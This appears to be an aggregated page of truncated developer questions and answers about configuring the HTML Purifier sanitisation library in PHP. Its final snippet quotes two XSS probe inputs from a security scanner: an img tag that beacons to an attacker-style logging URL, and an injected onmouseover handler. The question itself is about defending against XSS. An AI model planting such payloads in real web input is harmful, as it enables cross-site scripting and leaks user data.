htmlpurifier

How can I allow base64 data for the the src attribute of image tags? I see code like this: $config->set('URI.AllowedSchemes', array('http' => true, 'https' => true, 'mailto' => true, 'ftp' => true, 'nntp' => true, 'news' => true, 'data' => true)); In this case, is it data => true which allows the base64? And if so, how can I allow base64 data only for the src attribute of the img tag? (I do not want to allow data URIs in other situations.) I thought of doing something like: $ def-> addAttribute ('a', 'target', 'Enum # _blank, _self, _target, _top'); But in my case like this: $ def->

I am using htmlpurifier to clean up user content. I am trying to remove inline style attributes like <div style="float:left">some text</div> I want to remove the whole style attribute. How to do it using htmlpurifier? You can tweak the AllowedProperties configuration by passing it an array of valid css attributes that should not be removed (white-list approach). However, the following should remove all css attributes $config->set('CSS.AllowedProperties', array()); See this online demo of purifying your input html 来源： https://stackoverflow.com/questions/8881125/htmlpurifier-remove-inline-css

How do I allow borderRadius with htmlpurifier? I found this but it doesn't seem to work with current version of htmlpurifier, perhaps they changed the way you add your own css? http://htmlpurifier.org/phorum/read.php?2,6154,6154 $config = HTMLPurifier_Config::createDefault(); // add some custom CSS3 properties $css_definition = $config->getDefinition('CSS'); $border_radius = $info['border-top-left-radius'] = $info['border-top-right-radius'] = $info['border-bottom-left-radius'] = $info['border-bottom-right-radius'] = new HTMLPurifier_AttrDef_CSS_Composite(array( new HTMLPurifier_AttrDef_CSS

My html purifier settings now allow only these tags $configuration->set('HTML.Allowed', 'p,ul,ol,li'); I want to allow indentation of lists and my editor uses this html <ul style="margin-left: 40px;"> How should I change my HTMLPurifier Allowed tags? I thought to add style , but I think it would be better to specify exactly which style is allowed, which in this case would be margin-left . What is the right way to change the HTML.Allowed for this case? Allow the style attributes, and then modify the allowed CSS attributes using %CSS.AllowedProperties . $configuration->set('HTML.Allowed', 'p,ul

I want to use the HTMLpurifier in combination with the Zend Framework. I would love to load the Class and its files with the Zend_Loader. How would you include it? Would you just use the HTMLPurifier.auto.php or do you know a better way of doing it? I use HTML Purifier as a filter in my Zend Framework project. Here's an altered version of my class: require_once 'HTMLPurifier.includes.php'; require_once 'HTMLPurifier.autoload.php'; class My_Filter_HtmlPurifier implements Zend_Filter_Interface { protected $_htmlPurifier = null; public function __construct($options = null) { // set up

I am in the middle of creating a comment box where people can ask their questions. I get a lot of people asking how do they do something which involves inputting code into the form. The form goes through htmlpurifier to make sure its safe to use. But when ever someone inputs echo codes etc it does not allow it. Or if someone inputs a div then it does not allow that either, even when wrapping in the < code >. For instance this: <code><div class="classname"></div></code> will just add a div. and <code><?php echo $word; ?></code> Will not show the code at all. The way I have set this up the

I'm testing one of my web application using Acunetix . To protect this project against XSS attacks, I used HTML Purifier . This library is recommended by most of PHP developers for this purpose, but my scan results shows HTML Purifier can not protect us from XSS attacks completely. The scanner found two ways of attack by sending different harmful inputs: 1<img sRc='http://attacker-9437/log.php? (See HTML Purifier result here ) 1"onmouseover=vVF3(9185)" (See HTML Purifier result here ) As you can see results, HTML Purifier could not detect such attacks. I don't know if is there any specific